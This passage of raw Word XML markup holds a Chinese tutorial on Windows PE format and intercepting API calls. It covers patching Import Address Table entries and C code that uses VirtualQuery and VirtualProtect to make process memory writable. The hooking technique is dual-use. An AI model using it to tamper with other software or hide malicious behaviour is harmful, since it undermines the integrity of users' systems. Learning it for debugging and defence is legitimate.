        </w:rPr>
        <w:t>IMAGE_NT_HEADER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的数据，其中是许多关于整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的消息，在这段数据的尾端是一个称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Data Directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据表，通过它能快速定位一些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中段（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>section</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的地址。在这段数据之后，则是一个“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IMAGE_SECTION_HEADER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的列表，其中的每一项都详细描述了后面一个段的相关信息。接着它就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中最主要的段数据了，执行代码、数据和资源等等信息就分别存放在这些段中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在所有的这些段里，有一个被称为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.idata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的段（输入数据段）值得我们去注意，该段中包含着一些被称为输入地址表（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Address Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的数据列表。每个用隐式方式加载的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所在的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与之对应，同时一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地址也与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中一项相对应。当一个应用程序加载到内存中后，针对每一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数调用，相应的产生如下的汇编指令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JMP DWORD PTR [XXXXXXXX] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　或</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CALL DWORD PTR [XXXXXXXX]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　其中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[XXXXXXXX]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示指向了输入地址表中一个项，其内容是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而正是这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数在内存中的真正地址。因此我们要想拦截一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的调用，只要简单的把那个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改为我们自己的函数的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、修改调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　从上面对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件格式的分析可知，修改调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数代码其实是修改被调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数在输入地址表中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项内容。由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统对应用程序指令代码地址空间的严密保护机制，使得修改程序指令代码非常困难，以至于许多高手为之编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VxD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ring0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在这里，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>我为大家介绍一种较为方便的方法修改进程内存，它仅需要调用几个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>核心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，下面我首先来学会一下这几个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DWORD VirtualQuery(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LPCVOID lpAddress, // address of region</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PMEMORY_BASIC_INFORMATION lpBuffer, // information buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DWORD dwLength // size of buffer</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该函数用于查询关于本进程内虚拟地址页的信息。其中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lpAddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示被查询页的区域地址；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lpBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示用于保存查询页信息的缓冲；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dwLength</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示缓冲区大小。返回值为实际缓冲大小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BOOL VirtualProtect(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LPVOID lpAddress, // region of committed pages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SIZE_T dwSize, // size of the region</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DWORD flNewProtect, // desired access protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDWORD lpflOldProtect // old protection</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该函数用于改变本进程内虚拟地址页的保护属性。其中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>lpAddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示被改变保护属性页区域地址；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dwSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示页区域大小；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flNewProtect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示新的保护属性，可取值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PAGE_READONLY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PAGE_READWRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PAGE_EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lpflOldProtect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示用于保存改变前的保护属性。如果函数调用成功返回“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，否则返回“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　有了这两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，我们就可以随心所欲的修改进程内存了。首先，调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VirtualQuery()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数查询被修改内存的页信息，再根据此信息调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VirtualProtect()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数改变这些页的保护属性为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PAGE_READWRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，有了这个权限您就可以任意修改进程内存数据了。下面一段代码演示了如何将进程虚拟地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x0040106c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处的字节清零。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BYTE* pData = 0x0040106c;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MEMORY_BASIC_INFORMATION mbi_thunk; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询页信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualQuery(pData, &amp;mbi_thunk, sizeof(MEMORY_BASIC_INFORMATION)); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改变页保护属性为读写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualProtect(mbi_thunk.BaseAddress,mbi_thunk.RegionSize, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PAGE_READWRITE, &amp;mbi_thunk.Protect); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清零。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*pData = 0x00;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恢复页的原保护属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DWORD dwOldProtect; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualProtect(mbi_thunk.BaseAddress,mbi_thunk.RegionSize, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mbi_thunk.Protect, &amp;dwOldProtect); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
